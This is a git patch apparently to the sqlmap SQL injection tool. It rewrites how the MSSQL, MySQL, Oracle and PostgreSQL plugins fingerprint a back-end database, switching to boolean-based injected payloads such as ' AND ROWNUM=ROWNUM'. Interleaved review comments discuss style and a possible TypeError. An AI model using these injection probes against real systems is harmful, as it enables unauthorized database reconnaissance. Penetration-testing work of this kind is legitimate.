From 79c8d63b883287f85c5e48046badaab8139e47ad Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 22 Dec 2008 23:26:44 +0000
Subject: [PATCH] Major speed increase in DBMS basic fingerprint
---
 plugins/dbms/mssqlserver.py | 26 ++++++++++++++++----------
 plugins/dbms/mysql.py | 11 +++++++----
 plugins/dbms/oracle.py | 17 +++++++++++------
 plugins/dbms/postgresql.py | 13 +++++++++----
 4 files changed, 43 insertions(+), 24 deletions(-)
diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py
index 150e85577..0ff4f10e2 100644
--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@@ -177,18 +177,24 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 logger.info(logMsg)
 randInt = str(randomInt(1))
- query = "LTRIM(STR(LEN(%s)))" % randInt
- if inject.getValue(query) == "1":
- query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
- version = inject.getValue(query)
+ payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
+ result = Request.queryPage(payload)
- if version == "8":
- kb.dbmsVersion = ["2008"]
- elif version == "5":
- kb.dbmsVersion = ["2005"]
- elif version == "0":
- kb.dbmsVersion = ["2000"]
+ if result == True:
+ for version in ( 0, 5, 8 ):
+ payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
+ result = Request.queryPage(payload)
+
+ if result == True:
+ if version == 8:
+ kb.dbmsVersion = ["2008"]
+ elif version == 5:
+ kb.dbmsVersion = ["2005"]
+ elif version == 0:
+ kb.dbmsVersion = ["2000"]
+
+ break
 if kb.dbmsVersion:
 setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py
index b1456cf32..bd33fe0cb 100644
--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
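Review bot: The `if version == 8 … elif version == 0` chain inside the new `for version in ( 0, 5, 8 )` loop restates the tuple it iterates over, so every probe value is spelled out twice; iterating pairs removes the nested chain: `for digit, year in ((0, "2000"), (5, "2005"), (8, "2008")):`, format the payload with `% digit`, and on a hit set `kb.dbmsVersion = [year]` before the `break`. The page-comparison outcome is tested with `result == True` here and again in the mysql, oracle and postgresql hunks; if Request.queryPage returns a bool, `if result:` / `if not result:` is the idiomatic form, and if it can return something other than a bool, `is True` / `is not True` states that intent explicitly instead of relying on `==` coercion. When none of the three probes matches, the loop leaves kb.dbmsVersion untouched and only the `if kb.dbmsVersion:` check below sees it; what happens in that case is outside the hunk. The enclosing method starts and ends outside the hunk.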
@@ -249,15 +249,18 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 logger.info(logMsg)
 randInt = str(randomInt(1))
- query = "CONCAT('%s', '%s')" % (randInt, randInt)
- if inject.getValue(query) == (randInt * 2):
+ payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
+ result = Request.queryPage(payload)
+
+ if result == True:
 logMsg = "confirming MySQL"
 logger.info(logMsg)
- query = "LENGTH('%s')" % randInt
+ payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt))
+ result = Request.queryPage(payload)
- if not inject.getValue(query) == "1":
+ if result != True:
 warnMsg = "the back-end DMBS is not MySQL"
 logger.warn(warnMsg)
diff --git a/plugins/dbms/oracle.py b/plugins/dbms/oracle.py
index e39b76d33..b7ea11c53 100644
--- a/plugins/dbms/oracle.py
+++ b/plugins/dbms/oracle.py
@@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 import re
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -38,6 +39,7 @@ from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import ORACLE_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -163,17 +165,17 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 logMsg = "testing Oracle"
 logger.info(logMsg)
- query = "LENGTH(SYSDATE)"
- sysdate = inject.getValue(query)
+ payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
+ result = Request.queryPage(payload)
- if sysdate and int(sysdate) > 0:
+ if result == True:
 logMsg = "confirming Oracle"
 logger.info(logMsg)
- query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
- version = inject.getValue(query)
+ payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
+ result = Request.queryPage(payload)
- if not version:
+ if result != True:
 warnMsg = "the back-end DMBS is not Oracle"
 logger.warn(warnMsg)
@@ -186,6 +188,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 if not conf.extensiveFp:
 return True
+ query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
+ version = inject.getValue(query)
+
 if re.search("^11", version):
 kb.dbmsVersion = ["11i"]
 elif re.search("^10", version):
diff --git a/plugins/dbms/postgresql.py b/plugins/dbms/postgresql.py
index 903cfcf6e..886543c55 100644
--- a/plugins/dbms/postgresql.py
+++ b/plugins/dbms/postgresql.py
@@ -26,6 +26,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 import re
+from lib.core.agent import agent
 from lib.core.common import formatDBMSfp
 from lib.core.common import formatFingerprint
 from lib.core.common import getHtmlErrorFp
@@ -39,6 +40,7 @@ from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PGSQL_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.request import inject
+from lib.request.connect import Connect as Request
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
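Review bot: The `if not version:` guard that the first oracle hunk removes did not travel with the version query when the second hunk (`@@ -186`) moved it below the `if not conf.extensiveFp: return True` check, so `re.search("^11", version)` now receives whatever inject.getValue returns when the subquery yields nothing; if that is None (the old guard suggests it can be), the regex raises TypeError instead of the earlier warning. A guard between the assignment and the regex chain, e.g. `if not version:` followed by a warning and `return True` (the DBMS is already confirmed at that point, only its version is unknown), restores the old behaviour. The method containing both hunks starts and ends outside them.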
@@ -168,15 +170,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 logger.info(logMsg)
 randInt = str(randomInt(1))
- query = "COALESCE(%s, NULL)" % randInt
- if inject.getValue(query) == randInt:
+ payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
+ result = Request.queryPage(payload)
+
+ if result == True:
 logMsg = "confirming PostgreSQL"
 logger.info(logMsg)
- query = "LENGTH('%s')" % randInt
+ payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
+ result = Request.queryPage(payload)
- if not inject.getValue(query) == "1":
+ if result != True:
 warnMsg = "the back-end DMBS is not PostgreSQL"
 logger.warn(warnMsg)